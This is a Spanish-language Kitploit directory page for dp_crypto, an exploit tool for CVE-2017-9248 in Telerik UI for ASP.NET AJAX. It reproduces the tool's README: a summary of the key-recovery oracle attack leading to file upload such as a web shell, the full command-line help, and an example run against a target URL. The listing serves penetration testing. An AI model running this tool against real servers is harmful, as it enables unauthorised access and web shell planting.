Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
dp_crypto — Exploit de oráculo de cifrado basado en Base64 para CVE-2017-9248 (controlador de diálogo de Telerik UI para ASP.NET AJAX) | Kitploit
Herramientas/GitHubGitHub/bao7uo/dp_crypto
Herramientas de Cifrado/DescifradoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCriptografíaPruebas de Penetración
GitHubbao7uo/dp_crypto

dp_crypto

Exploit de oráculo de cifrado basado en Base64 para CVE-2017-9248 (controlador de diálogo de Telerik UI para ASP.NET AJAX)

Ver Repositorio
1774913hace 5 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

dp_crypto

Language

Exploit de oráculo de cifrado basado en Base64 para CVE-2017-9248 (Manejador de diálogo de Telerik UI for ASP.NET AJAX)

Publicado en exploit-db

Actualización 2020 - Tenga en cuenta que la versión en exploit-db ahora está muy desactualizada en comparación con la última versión aquí en GitHub.

  • https://www.exploit-db.com/exploits/43873/

Véase también

Mi otro exploit de Telerik UI (para CVE-2017-11317 y CVE-2017-11357) probablemente también sea de interés. Está disponible aquí:

  • https://github.com/bao7uo/RAU_crypto

Resumen

Este exploit ataca una implementación de cifrado débil para descubrir la clave del manejador de diálogo para versiones vulnerables de Telerik UI for ASP.NET AJAX, luego proporciona un enlace cifrado que da acceso a un administrador de archivos y permite la carga arbitraria de archivos (por ejemplo, web shell) si los permisos de archivos remotos lo permiten. Funciona hasta la versión 2017.1.118 inclusive.

dp_crypto screenshot

Uso

$ python3 dp_crypto.py -h

dp_crypto by Paul Taylor / @bao7uo
CVE-2017-9248 - Telerik.Web.UI.dll Cryptographic compromise

usage: dp_crypto.py [-h] {d,e,k,b,p} ...

positional arguments:
  {d,e,k,b,p}
    d          Decrypt a ciphertext
    e          Encrypt a plaintext
    k          Bruteforce key/generate URL
    b          Encode parameter to base64
    p          Decode base64 parameter

optional arguments:
  -h, --help   show this help message and exit

Para encontrar una clave:

$ python3 dp_crypto.py k -h

dp_crypto by Paul Taylor / @bao7uo
CVE-2017-9248 - Telerik.Web.UI.dll Cryptographic compromise

usage: dp_crypto.py k [-h] -u URL [-l KEY_LEN] [-o ORACLE] [-v VERSION] [-c CHARSET] [-a ACCURACY] [-r RESUME_KEY] [-p PROXY]

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target URL, e.g. https://???.???.???/Telerik.Web.UI.DialogHandler.aspx
  -l KEY_LEN, --key-len KEY_LEN
                        Len of the key to retrieve, OPTIONAL: default is 48
  -o ORACLE, --oracle ORACLE
                        The oracle text to use. OPTIONAL: default value is for english version, other languages may have other error message
  -v VERSION, --version VERSION
                        OPTIONAL. Specify the version to use rather than iterating over all of them
  -c CHARSET, --charset CHARSET
                        Charset used by the key, can use all, hex, or user defined. OPTIONAL: default is hex
  -a ACCURACY, --accuracy ACCURACY
                        Maximum accuracy is out of 64 where 64 is the most accurate, accuracy of 9 will usually suffice for a hex, but 21 or more might be needed
                        when testing all ascii characters. Increase the accuracy argument if no valid version is found. OPTIONAL: default is 9.
  -r RESUME_KEY, --resume-key RESUME_KEY
                        Specify a partial key to resume testing, or complete key to get the URL.
  -p PROXY, --proxy PROXY
                        Specify OPTIONAL proxy server, e.g. 127.0.0.1:8080

Ejemplo

dp_crypto screenshot

$ ./dp_crypto.py k -u http://fake.bao7uo.com/Telerik.Web.UI.DialogHandler.aspx

dp_crypto by Paul Taylor / @bao7uo
CVE-2017-9248 - Telerik.Web.UI.dll Cryptographic compromise

Attacking http://192.168.55.2/Telerik.Web.UI.DialogHandler.aspx
to find key of length [48] with accuracy threshold [9]
using key charset [01234567890ABCDEF]
Descargar herramienta